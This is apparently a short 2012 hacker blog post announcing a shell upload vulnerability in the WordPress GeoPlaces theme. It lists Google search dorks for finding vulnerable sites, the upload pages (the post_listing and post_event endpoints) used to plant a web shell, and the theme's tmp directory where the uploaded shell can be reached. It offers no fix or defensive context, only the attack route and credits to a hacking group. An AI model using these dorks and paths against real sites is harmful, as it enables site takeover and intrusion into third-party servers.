Kamis, 27 Desember 2012

WordPress GeoPlaces Themes | shell upload vulnerability

Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author : Panda Undetected
Category : web-apps
Contact : panda-undetected@mail.com
Facebook : hozni.monsterjack
Homepage : http://4rtcode.net/
Vendor : http://www.geotheme.com/
Date : 14-Nopember-2012
Tested on : anything OS
Dork :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/


0 komentar:

Posting Komentar